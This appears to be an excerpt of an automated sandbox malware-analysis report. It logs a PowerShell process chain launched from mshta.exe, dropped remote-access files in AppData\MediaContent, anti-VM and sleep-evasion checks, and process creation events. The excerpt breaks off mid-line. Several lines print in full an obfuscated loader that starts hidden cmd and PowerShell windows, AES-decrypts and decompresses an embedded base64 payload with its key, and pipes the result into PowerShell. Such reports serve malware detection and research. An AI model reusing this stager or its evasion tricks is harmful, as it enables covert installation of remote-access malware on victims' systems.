                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6776Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6676Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 772Thread sleep count: 1575 > 30Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6744Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5328Thread sleep count: 242 > 30Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6172Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6844Thread sleep count: 7082 > 30Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7084Thread sleep count: 2012 > 30Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6248Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6248Thread sleep time: -595266s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exe TID: 8096Thread sleep time: -42800s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exeLast function: Thread delayed
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\MediaContent\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\MediaContent\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\MediaContent\bootuwf.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\MediaContent\memtest.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\MediaContent\bootvhd.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 595266Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2636Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 386Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1575Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7082Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2012Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exeWindow / User API: threadDelayed 428Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 595266Jump to behavior
                                Source: powershell.exe, 00000002.00000002.271947909.00000000073A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+s41`
                                Source: powershell.exe, 00000002.00000002.264547479.000000000438C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
                                Source: powershell.exe, 00000002.00000002.264547479.000000000438C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.272842190.00000000055DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.272842190.000000000515D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Jq:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                                Source: client32.exe, 00000015.00000003.327765673.000000000119B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000003.328184871.0000000003C36000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000003.327334576.000000000118E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000003.328496450.0000000003C36000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000003.387067655.0000000001179000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000003.327368044.0000000003C42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: powershell.exe, 00000002.00000002.264547479.000000000438C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.272842190.00000000055DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-VlBJq
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted start-process 'cmd.exe' -windowstyle hidden -argumentlist {/c powershell.exe $cwwl = 'aaaaaaaaaaaaaaaaaaaaacgw0ktxfdt7vygqwkvuwzworwwq3for84lkr0hidbn55hu2p/qah7ukiclpja/xsje84njjo6jid61fi3om68eocgqv7+xcdpabw0jxs0bnlsjcdsqlwtliz1e8r3s8ajj1pumqy7ww9ut2vonu9+010dg1zxzzgrna/hcsuz5yvlblgbkews5uqz7ksxbyb+ciclftcoklkzz7/mgcao3wn7zez9gb0u7sliy7/xgnqsb0l3y8s69rujddmpyrh/rzgp2gf/qgjhb69/jjuk79sbgoiim5ovsj9cpwdthdrf2p9xkkgkxcbzjk9sv8cquolvmo0s3whoiyqmsy+pqxj4e/1jontj7rpinv74j3axt+r8la7t/hmwunuxugjbbnyl3fdw8s+g5jnu2lt2qbmjnycxdzehhs37qr0lcaxlnh7pqhbdgnyumxna6gjlxd0f87ey0fnf6zb/er50wxpe/dxv/2vom4h7eonay3pyelb6cfgk5v+vcmzz1g3fhk+od59x4tiq/jsbjrv1tbgak4pwwukiat07qtb8nb6lwm7kzwo7hjpzygy+dvue1b5poeflx54pwq3fedtfctsptbrylkdvk0nxyfp/g/pv523vbkf67xcbp4jyyn0trkraorzouhersuwwhhbgshkwmxic+l1pjdcozyeefszmwlbm2jfbwg0ymokbzg4tcb0wxvmt2cmatl9cem3kfsu75jxtnn4spkmmxgpemj2ldy7zr1o9hp6kbkk+bji3gfmb9ry8y1xwivburw2uyypecbxn38x9tvobsojubzqse9wj2tyhbrmhmbrlqu/tovc/zqfuwqwaj35wkekei0pa4ioehdhfzuxes8dje0qsoj3xncxb/cqtf5hweilopuxhlrhfevyvbv0bydrlzqzgbt9wnyyl/ulpyqa5jnbublmlaceqgfqqpn9jaeiild/wra2pz15h459lgu0en5qvzpnftlza+wkpfbxvyyxlcop8wapuaztyj70nhyqkevtwo9/5jraew4vqzchog2aaorryecnioyj+vnqvardafr/6jojiugdfpzql8agehmghjttikhbattw3jxm42zxyle11kzt5pk56yj3z/5o6urs7i1tdnr5oycuy5kmyjfu4f53fc65md/65hgrrktgdjwauckrazvmplhsromk4x6nkqcn/lspzrvhtbwxfpvfq8ksxap1wfuqdn8gz0z4sbapyzdzptss35qdlmo7wjjpr5h/lrd0em7gmqwijrcpuf5onwzehfam9maflouaynybcjeor/t4xmdsihkezxjsr6x6wrkze3ph08iwnejlkithujabgexmkq8xztqjnpi3oecxcdmsjl9hr3dnsx8d2uijz15eyelg8esgn9njz3gnn6i6aoa8nxikvlotj5fw1lq6si93ovumtwnrqlo++5wkqe7pyfdzxcbf7x5vigs0+mvugezqsejinvtyjx6gcekw6bnjq0n5pzu62zo37pxleodb7pm4qj+5gti1gmy0n94xqmvltwhene=';$osjngw = 'rvjyq3fgsfzxtuvhcnp3s2zycfp2vhh0rxfudmjywhu=';$hyoynbe = new-object 'system.security.cryptography.aesmanaged';$hyoynbe.mode = [system.security.cryptography.ciphermode]::ecb;$hyoynbe.padding = [system.security.cryptography.paddingmode]::zeros;$hyoynbe.blocksize = 128;$hyoynbe.keysize = 256;$hyoynbe.key = [system.convert]::frombase64string($osjngw);$mojfo = [system.convert]::frombase64string($cwwl);$qfsoizvu = $mojfo[0..15];$hyoynbe.iv = $qfsoizvu;$vcdtgjdlo = $hyoynbe.createdecryptor();$kqwgqywut = $vcdtgjdlo.transformfinalblock($mojfo, 16, $mojfo.length - 16);$hyoynbe.dispose();$enauwbr = new-object system.io.memorystream( , $kqwgqywut );$sqftam = new-object system.io.memorystream;$shlbzafix = new-object system.io.compression.gzipstream $enauwbr, ([io.compression.compressionmode]::decompress);$shlbzafix.copyto( $sqftam );$shlbzafix.close();$enauwbr.close();[byte[]] $dnznxe = $sqftam.toarray();$xzhvto = [system.text.encoding]::utf8.getstring($dnznxe);$xzhvto | powershell - }
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c powershell.exe $cwwl = 'aaaaaaaaaaaaaaaaaaaaacgw0ktxfdt7vygqwkvuwzworwwq3for84lkr0hidbn55hu2p/qah7ukiclpja/xsje84njjo6jid61fi3om68eocgqv7+xcdpabw0jxs0bnlsjcdsqlwtliz1e8r3s8ajj1pumqy7ww9ut2vonu9+010dg1zxzzgrna/hcsuz5yvlblgbkews5uqz7ksxbyb+ciclftcoklkzz7/mgcao3wn7zez9gb0u7sliy7/xgnqsb0l3y8s69rujddmpyrh/rzgp2gf/qgjhb69/jjuk79sbgoiim5ovsj9cpwdthdrf2p9xkkgkxcbzjk9sv8cquolvmo0s3whoiyqmsy+pqxj4e/1jontj7rpinv74j3axt+r8la7t/hmwunuxugjbbnyl3fdw8s+g5jnu2lt2qbmjnycxdzehhs37qr0lcaxlnh7pqhbdgnyumxna6gjlxd0f87ey0fnf6zb/er50wxpe/dxv/2vom4h7eonay3pyelb6cfgk5v+vcmzz1g3fhk+od59x4tiq/jsbjrv1tbgak4pwwukiat07qtb8nb6lwm7kzwo7hjpzygy+dvue1b5poeflx54pwq3fedtfctsptbrylkdvk0nxyfp/g/pv523vbkf67xcbp4jyyn0trkraorzouhersuwwhhbgshkwmxic+l1pjdcozyeefszmwlbm2jfbwg0ymokbzg4tcb0wxvmt2cmatl9cem3kfsu75jxtnn4spkmmxgpemj2ldy7zr1o9hp6kbkk+bji3gfmb9ry8y1xwivburw2uyypecbxn38x9tvobsojubzqse9wj2tyhbrmhmbrlqu/tovc/zqfuwqwaj35wkekei0pa4ioehdhfzuxes8dje0qsoj3xncxb/cqtf5hweilopuxhlrhfevyvbv0bydrlzqzgbt9wnyyl/ulpyqa5jnbublmlaceqgfqqpn9jaeiild/wra2pz15h459lgu0en5qvzpnftlza+wkpfbxvyyxlcop8wapuaztyj70nhyqkevtwo9/5jraew4vqzchog2aaorryecnioyj+vnqvardafr/6jojiugdfpzql8agehmghjttikhbattw3jxm42zxyle11kzt5pk56yj3z/5o6urs7i1tdnr5oycuy5kmyjfu4f53fc65md/65hgrrktgdjwauckrazvmplhsromk4x6nkqcn/lspzrvhtbwxfpvfq8ksxap1wfuqdn8gz0z4sbapyzdzptss35qdlmo7wjjpr5h/lrd0em7gmqwijrcpuf5onwzehfam9maflouaynybcjeor/t4xmdsihkezxjsr6x6wrkze3ph08iwnejlkithujabgexmkq8xztqjnpi3oecxcdmsjl9hr3dnsx8d2uijz15eyelg8esgn9njz3gnn6i6aoa8nxikvlotj5fw1lq6si93ovumtwnrqlo++5wkqe7pyfdzxcbf7x5vigs0+mvugezqsejinvtyjx6gcekw6bnjq0n5pzu62zo37pxleodb7pm4qj+5gti1gmy0n94xqmvltwhene=';$osjngw = 'rvjyq3fgsfzxtuvhcnp3s2zycfp2vhh0rxfudmjywhu=';$hyoynbe = new-object 'system.security.cryptography.aesmanaged';$hyoynbe.mode = [system.security.cryptography.ciphermode]::ecb;$hyoynbe.padding = [system.security.cryptography.paddingmode]::zeros;$hyoynbe.blocksize = 128;$hyoynbe.keysize = 256;$hyoynbe.key = [system.convert]::frombase64string($osjngw);$mojfo = [system.convert]::frombase64string($cwwl);$qfsoizvu = $mojfo[0..15];$hyoynbe.iv = $qfsoizvu;$vcdtgjdlo = $hyoynbe.createdecryptor();$kqwgqywut = $vcdtgjdlo.transformfinalblock($mojfo, 16, $mojfo.length - 16);$hyoynbe.dispose();$enauwbr = new-object system.io.memorystream( , $kqwgqywut );$sqftam = new-object system.io.memorystream;$shlbzafix = new-object system.io.compression.gzipstream $enauwbr, ([io.compression.compressionmode]::decompress);$shlbzafix.copyto( $sqftam );$shlbzafix.close();$enauwbr.close();[byte[]] $dnznxe = $sqftam.toarray();$xzhvto = [system.text.encoding]::utf8.getstring($dnznxe);$xzhvto | powershell -
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe $cwwl = 'aaaaaaaaaaaaaaaaaaaaacgw0ktxfdt7vygqwkvuwzworwwq3for84lkr0hidbn55hu2p/qah7ukiclpja/xsje84njjo6jid61fi3om68eocgqv7+xcdpabw0jxs0bnlsjcdsqlwtliz1e8r3s8ajj1pumqy7ww9ut2vonu9+010dg1zxzzgrna/hcsuz5yvlblgbkews5uqz7ksxbyb+ciclftcoklkzz7/mgcao3wn7zez9gb0u7sliy7/xgnqsb0l3y8s69rujddmpyrh/rzgp2gf/qgjhb69/jjuk79sbgoiim5ovsj9cpwdthdrf2p9xkkgkxcbzjk9sv8cquolvmo0s3whoiyqmsy+pqxj4e/1jontj7rpinv74j3axt+r8la7t/hmwunuxugjbbnyl3fdw8s+g5jnu2lt2qbmjnycxdzehhs37qr0lcaxlnh7pqhbdgnyumxna6gjlxd0f87ey0fnf6zb/er50wxpe/dxv/2vom4h7eonay3pyelb6cfgk5v+vcmzz1g3fhk+od59x4tiq/jsbjrv1tbgak4pwwukiat07qtb8nb6lwm7kzwo7hjpzygy+dvue1b5poeflx54pwq3fedtfctsptbrylkdvk0nxyfp/g/pv523vbkf67xcbp4jyyn0trkraorzouhersuwwhhbgshkwmxic+l1pjdcozyeefszmwlbm2jfbwg0ymokbzg4tcb0wxvmt2cmatl9cem3kfsu75jxtnn4spkmmxgpemj2ldy7zr1o9hp6kbkk+bji3gfmb9ry8y1xwivburw2uyypecbxn38x9tvobsojubzqse9wj2tyhbrmhmbrlqu/tovc/zqfuwqwaj35wkekei0pa4ioehdhfzuxes8dje0qsoj3xncxb/cqtf5hweilopuxhlrhfevyvbv0bydrlzqzgbt9wnyyl/ulpyqa5jnbublmlaceqgfqqpn9jaeiild/wra2pz15h459lgu0en5qvzpnftlza+wkpfbxvyyxlcop8wapuaztyj70nhyqkevtwo9/5jraew4vqzchog2aaorryecnioyj+vnqvardafr/6jojiugdfpzql8agehmghjttikhbattw3jxm42zxyle11kzt5pk56yj3z/5o6urs7i1tdnr5oycuy5kmyjfu4f53fc65md/65hgrrktgdjwauckrazvmplhsromk4x6nkqcn/lspzrvhtbwxfpvfq8ksxap1wfuqdn8gz0z4sbapyzdzptss35qdlmo7wjjpr5h/lrd0em7gmqwijrcpuf5onwzehfam9maflouaynybcjeor/t4xmdsihkezxjsr6x6wrkze3ph08iwnejlkithujabgexmkq8xztqjnpi3oecxcdmsjl9hr3dnsx8d2uijz15eyelg8esgn9njz3gnn6i6aoa8nxikvlotj5fw1lq6si93ovumtwnrqlo++5wkqe7pyfdzxcbf7x5vigs0+mvugezqsejinvtyjx6gcekw6bnjq0n5pzu62zo37pxleodb7pm4qj+5gti1gmy0n94xqmvltwhene=';$osjngw = 'rvjyq3fgsfzxtuvhcnp3s2zycfp2vhh0rxfudmjywhu=';$hyoynbe = new-object 'system.security.cryptography.aesmanaged';$hyoynbe.mode = [system.security.cryptography.ciphermode]::ecb;$hyoynbe.padding = [system.security.cryptography.paddingmode]::zeros;$hyoynbe.blocksize = 128;$hyoynbe.keysize = 256;$hyoynbe.key = [system.convert]::frombase64string($osjngw);$mojfo = [system.convert]::frombase64string($cwwl);$qfsoizvu = $mojfo[0..15];$hyoynbe.iv = $qfsoizvu;$vcdtgjdlo = $hyoynbe.createdecryptor();$kqwgqywut = $vcdtgjdlo.transformfinalblock($mojfo, 16, $mojfo.length - 16);$hyoynbe.dispose();$enauwbr = new-object system.io.memorystream( , $kqwgqywut );$sqftam = new-object system.io.memorystream;$shlbzafix = new-object system.io.compression.gzipstream $enauwbr, ([io.compression.compressionmode]::decompress);$shlbzafix.copyto( $sqftam );$shlbzafix.close();$enauwbr.close();[byte[]] $dnznxe = $sqftam.toarray();$xzhvto = [system.text.encoding]::utf8.getstring($dnznxe);$xzhvto
                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted start-process 'cmd.exe' -windowstyle hidden -argumentlist {/c powershell.exe $cwwl = 'aaaaaaaaaaaaaaaaaaaaacgw0ktxfdt7vygqwkvuwzworwwq3for84lkr0hidbn55hu2p/qah7ukiclpja/xsje84njjo6jid61fi3om68eocgqv7+xcdpabw0jxs0bnlsjcdsqlwtliz1e8r3s8ajj1pumqy7ww9ut2vonu9+010dg1zxzzgrna/hcsuz5yvlblgbkews5uqz7ksxbyb+ciclftcoklkzz7/mgcao3wn7zez9gb0u7sliy7/xgnqsb0l3y8s69rujddmpyrh/rzgp2gf/qgjhb69/jjuk79sbgoiim5ovsj9cpwdthdrf2p9xkkgkxcbzjk9sv8cquolvmo0s3whoiyqmsy+pqxj4e/1jontj7rpinv74j3axt+r8la7t/hmwunuxugjbbnyl3fdw8s+g5jnu2lt2qbmjnycxdzehhs37qr0lcaxlnh7pqhbdgnyumxna6gjlxd0f87ey0fnf6zb/er50wxpe/dxv/2vom4h7eonay3pyelb6cfgk5v+vcmzz1g3fhk+od59x4tiq/jsbjrv1tbgak4pwwukiat07qtb8nb6lwm7kzwo7hjpzygy+dvue1b5poeflx54pwq3fedtfctsptbrylkdvk0nxyfp/g/pv523vbkf67xcbp4jyyn0trkraorzouhersuwwhhbgshkwmxic+l1pjdcozyeefszmwlbm2jfbwg0ymokbzg4tcb0wxvmt2cmatl9cem3kfsu75jxtnn4spkmmxgpemj2ldy7zr1o9hp6kbkk+bji3gfmb9ry8y1xwivburw2uyypecbxn38x9tvobsojubzqse9wj2tyhbrmhmbrlqu/tovc/zqfuwqwaj35wkekei0pa4ioehdhfzuxes8dje0qsoj3xncxb/cqtf5hweilopuxhlrhfevyvbv0bydrlzqzgbt9wnyyl/ulpyqa5jnbublmlaceqgfqqpn9jaeiild/wra2pz15h459lgu0en5qvzpnftlza+wkpfbxvyyxlcop8wapuaztyj70nhyqkevtwo9/5jraew4vqzchog2aaorryecnioyj+vnqvardafr/6jojiugdfpzql8agehmghjttikhbattw3jxm42zxyle11kzt5pk56yj3z/5o6urs7i1tdnr5oycuy5kmyjfu4f53fc65md/65hgrrktgdjwauckrazvmplhsromk4x6nkqcn/lspzrvhtbwxfpvfq8ksxap1wfuqdn8gz0z4sbapyzdzptss35qdlmo7wjjpr5h/lrd0em7gmqwijrcpuf5onwzehfam9maflouaynybcjeor/t4xmdsihkezxjsr6x6wrkze3ph08iwnejlkithujabgexmkq8xztqjnpi3oecxcdmsjl9hr3dnsx8d2uijz15eyelg8esgn9njz3gnn6i6aoa8nxikvlotj5fw1lq6si93ovumtwnrqlo++5wkqe7pyfdzxcbf7x5vigs0+mvugezqsejinvtyjx6gcekw6bnjq0n5pzu62zo37pxleodb7pm4qj+5gti1gmy0n94xqmvltwhene=';$osjngw = 'rvjyq3fgsfzxtuvhcnp3s2zycfp2vhh0rxfudmjywhu=';$hyoynbe = new-object 'system.security.cryptography.aesmanaged';$hyoynbe.mode = [system.security.cryptography.ciphermode]::ecb;$hyoynbe.padding = [system.security.cryptography.paddingmode]::zeros;$hyoynbe.blocksize = 128;$hyoynbe.keysize = 256;$hyoynbe.key = [system.convert]::frombase64string($osjngw);$mojfo = [system.convert]::frombase64string($cwwl);$qfsoizvu = $mojfo[0..15];$hyoynbe.iv = $qfsoizvu;$vcdtgjdlo = $hyoynbe.createdecryptor();$kqwgqywut = $vcdtgjdlo.transformfinalblock($mojfo, 16, $mojfo.length - 16);$hyoynbe.dispose();$enauwbr = new-object system.io.memorystream( , $kqwgqywut );$sqftam = new-object system.io.memorystream;$shlbzafix = new-object system.io.compression.gzipstream $enauwbr, ([io.compression.compressionmode]::decompress);$shlbzafix.copyto( $sqftam );$shlbzafix.close();$enauwbr.close();[byte[]] $dnznxe = $sqftam.toarray();$xzhvto = [system.text.encoding]::utf8.getstring($dnznxe);$xzhvto | powershell - }Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c powershell.exe $cwwl = 'aaaaaaaaaaaaaaaaaaaaacgw0ktxfdt7vygqwkvuwzworwwq3for84lkr0hidbn55hu2p/qah7ukiclpja/xsje84njjo6jid61fi3om68eocgqv7+xcdpabw0jxs0bnlsjcdsqlwtliz1e8r3s8ajj1pumqy7ww9ut2vonu9+010dg1zxzzgrna/hcsuz5yvlblgbkews5uqz7ksxbyb+ciclftcoklkzz7/mgcao3wn7zez9gb0u7sliy7/xgnqsb0l3y8s69rujddmpyrh/rzgp2gf/qgjhb69/jjuk79sbgoiim5ovsj9cpwdthdrf2p9xkkgkxcbzjk9sv8cquolvmo0s3whoiyqmsy+pqxj4e/1jontj7rpinv74j3axt+r8la7t/hmwunuxugjbbnyl3fdw8s+g5jnu2lt2qbmjnycxdzehhs37qr0lcaxlnh7pqhbdgnyumxna6gjlxd0f87ey0fnf6zb/er50wxpe/dxv/2vom4h7eonay3pyelb6cfgk5v+vcmzz1g3fhk+od59x4tiq/jsbjrv1tbgak4pwwukiat07qtb8nb6lwm7kzwo7hjpzygy+dvue1b5poeflx54pwq3fedtfctsptbrylkdvk0nxyfp/g/pv523vbkf67xcbp4jyyn0trkraorzouhersuwwhhbgshkwmxic+l1pjdcozyeefszmwlbm2jfbwg0ymokbzg4tcb0wxvmt2cmatl9cem3kfsu75jxtnn4spkmmxgpemj2ldy7zr1o9hp6kbkk+bji3gfmb9ry8y1xwivburw2uyypecbxn38x9tvobsojubzqse9wj2tyhbrmhmbrlqu/tovc/zqfuwqwaj35wkekei0pa4ioehdhfzuxes8dje0qsoj3xncxb/cqtf5hweilopuxhlrhfevyvbv0bydrlzqzgbt9wnyyl/ulpyqa5jnbublmlaceqgfqqpn9jaeiild/wra2pz15h459lgu0en5qvzpnftlza+wkpfbxvyyxlcop8wapuaztyj70nhyqkevtwo9/5jraew4vqzchog2aaorryecnioyj+vnqvardafr/6jojiugdfpzql8agehmghjttikhbattw3jxm42zxyle11kzt5pk56yj3z/5o6urs7i1tdnr5oycuy5kmyjfu4f53fc65md/65hgrrktgdjwauckrazvmplhsromk4x6nkqcn/lspzrvhtbwxfpvfq8ksxap1wfuqdn8gz0z4sbapyzdzptss35qdlmo7wjjpr5h/lrd0em7gmqwijrcpuf5onwzehfam9maflouaynybcjeor/t4xmdsihkezxjsr6x6wrkze3ph08iwnejlkithujabgexmkq8xztqjnpi3oecxcdmsjl9hr3dnsx8d2uijz15eyelg8esgn9njz3gnn6i6aoa8nxikvlotj5fw1lq6si93ovumtwnrqlo++5wkqe7pyfdzxcbf7x5vigs0+mvugezqsejinvtyjx6gcekw6bnjq0n5pzu62zo37pxleodb7pm4qj+5gti1gmy0n94xqmvltwhene=';$osjngw = 